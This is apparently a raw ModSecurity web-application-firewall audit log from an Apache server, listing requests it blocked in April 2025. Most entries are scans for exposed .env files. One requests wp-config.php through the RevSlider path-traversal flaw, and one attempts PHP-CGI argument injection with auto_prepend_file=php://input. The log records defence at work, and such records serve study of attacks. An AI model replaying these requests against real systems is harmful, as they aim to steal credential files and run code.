[tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745845064140788 963 (- - -) Stopwatch2: 1745845064140788 963; combined=455, p1=402, p2=0, p3=0, p4=0, p5=52, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42ccf10e-Z-- --9a379451-A-- [28/Apr/2025:21:31:25 +0700] aA-RPcJruAEpaSEZ7DAjywAAAAo 103.236.140.4 46138 103.236.140.4 8181 --9a379451-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 157.230.19.140 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9a379451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a379451-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745850685734453 772 (- - -) Stopwatch2: 1745850685734453 772; combined=319, p1=288, p2=0, p3=0, p4=0, p5=31, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a379451-Z-- --53bdec61-A-- [28/Apr/2025:21:36:10 +0700] aA-SWsJruAEpaSEZ7DAnrgAAAAY 103.236.140.4 32838 103.236.140.4 8181 --53bdec61-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.139.141.27 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.139.141.27 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --53bdec61-C-- --53bdec61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53bdec61-E-- --53bdec61-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745850970870959 4269 (- - -) Stopwatch2: 1745850970870959 4269; combined=2760, p1=438, p2=2289, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53bdec61-Z-- --1a660637-A-- [28/Apr/2025:21:49:42 +0700] aA-VhlT4soy9XydcuKYFwgAAAE4 103.236.140.4 48126 103.236.140.4 8181 --1a660637-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1a660637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a660637-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851782250491 833 (- - -) Stopwatch2: 1745851782250491 833; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a660637-Z-- --1110c909-A-- [28/Apr/2025:21:49:43 +0700] aA-Vh2j1i6BJZll4jGMa8gAAAII 103.236.140.4 48208 103.236.140.4 8181 --1110c909-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1110c909-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1110c909-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851783226841 775 (- - -) Stopwatch2: 1745851783226841 775; combined=282, p1=251, p2=0, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1110c909-Z-- --12fff32d-A-- [28/Apr/2025:21:49:43 +0700] aA-Vh2j1i6BJZll4jGMa-AAAAIU 103.236.140.4 48266 103.236.140.4 8181 --12fff32d-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --12fff32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12fff32d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851783860304 677 (- - -) Stopwatch2: 1745851783860304 677; combined=213, p1=187, p2=0, p3=0, p4=0, p5=26, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12fff32d-Z-- --1b758d03-A-- [28/Apr/2025:21:49:44 +0700] aA-ViFT4soy9XydcuKYF0wAAAFE 103.236.140.4 48320 103.236.140.4 8181 --1b758d03-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1b758d03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b758d03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851784504542 614 (- - -) Stopwatch2: 1745851784504542 614; combined=264, p1=240, p2=0, p3=0, p4=0, p5=24, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b758d03-Z-- --35399669-A-- [28/Apr/2025:21:49:44 +0700] aA-ViI_5LpLtj_OTfS9FaAAAAMc 103.236.140.4 48358 103.236.140.4 8181 --35399669-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --35399669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35399669-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851784963478 811 (- - -) Stopwatch2: 1745851784963478 811; combined=311, p1=254, p2=0, p3=0, p4=0, p5=57, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35399669-Z-- --129d3644-A-- [28/Apr/2025:21:49:45 +0700] aA-ViY_5LpLtj_OTfS9FbAAAANU 103.236.140.4 48408 103.236.140.4 8181 --129d3644-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --129d3644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --129d3644-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851785595860 857 (- - -) Stopwatch2: 1745851785595860 857; combined=304, p1=269, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --129d3644-Z-- --39a08d3c-A-- [28/Apr/2025:21:49:46 +0700] aA-VisJruAEpaSEZ7DAyigAAAAQ 103.236.140.4 48466 103.236.140.4 8181 --39a08d3c-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --39a08d3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a08d3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851786235939 772 (- - -) Stopwatch2: 1745851786235939 772; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a08d3c-Z-- --d8989d4b-A-- [28/Apr/2025:21:49:46 +0700] aA-Vio_5LpLtj_OTfS9FcgAAAM4 103.236.140.4 48528 103.236.140.4 8181 --d8989d4b-B-- GET /sites/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --d8989d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8989d4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851786957353 622 (- - -) Stopwatch2: 1745851786957353 622; combined=217, p1=191, p2=0, p3=0, p4=0, p5=25, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8989d4b-Z-- --23107a24-A-- [28/Apr/2025:21:49:47 +0700] aA-Vi8JruAEpaSEZ7DAykwAAAAA 103.236.140.4 48582 103.236.140.4 8181 --23107a24-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --23107a24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23107a24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851787727027 850 (- - -) Stopwatch2: 1745851787727027 850; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23107a24-Z-- --78460a67-A-- [28/Apr/2025:21:49:48 +0700] aA-VjI_5LpLtj_OTfS9FdAAAAMo 103.236.140.4 48656 103.236.140.4 8181 --78460a67-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --78460a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78460a67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851788546617 771 (- - -) Stopwatch2: 1745851788546617 771; combined=297, p1=261, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78460a67-Z-- --ee607915-A-- [28/Apr/2025:21:49:49 +0700] aA-VjWj1i6BJZll4jGMbCgAAAJg 103.236.140.4 48694 103.236.140.4 8181 --ee607915-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --ee607915-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee607915-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851789006086 667 (- - -) Stopwatch2: 1745851789006086 667; combined=278, p1=252, p2=0, p3=0, p4=0, p5=26, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee607915-Z-- --9bb82f13-A-- [28/Apr/2025:21:49:49 +0700] aA-VjWj1i6BJZll4jGMbDgAAAJQ 103.236.140.4 48736 103.236.140.4 8181 --9bb82f13-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --9bb82f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb82f13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851789546857 786 (- - -) Stopwatch2: 1745851789546857 786; combined=289, p1=252, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb82f13-Z-- --e6a86b25-A-- [28/Apr/2025:22:10:29 +0700] aA-aZcJruAEpaSEZ7DBDIAAAAAg 103.236.140.4 58084 103.236.140.4 8181 --e6a86b25-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.56.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.56.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e6a86b25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6a86b25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745853029626536 647 (- - -) Stopwatch2: 1745853029626536 647; combined=273, p1=245, p2=0, p3=0, p4=0, p5=27, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6a86b25-Z-- --77f64967-A-- [28/Apr/2025:22:23:15 +0700] aA-dY8JruAEpaSEZ7DBM_wAAAAE 103.236.140.4 36978 103.236.140.4 8181 --77f64967-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 Accept-Charset: utf-8 --77f64967-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77f64967-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745853795865914 809 (- - -) Stopwatch2: 1745853795865914 809; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77f64967-Z-- --4386f56c-A-- [28/Apr/2025:22:23:28 +0700] aA-dcI_5LpLtj_OTfS9fSAAAANI 103.236.140.4 37524 103.236.140.4 8181 --4386f56c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; CrOS x86_64 12239.67.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.102 Safari/537.36 Accept-Charset: utf-8 --4386f56c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4386f56c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745853808090624 625 (- - -) Stopwatch2: 1745853808090624 625; combined=260, p1=224, p2=0, p3=0, p4=0, p5=36, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
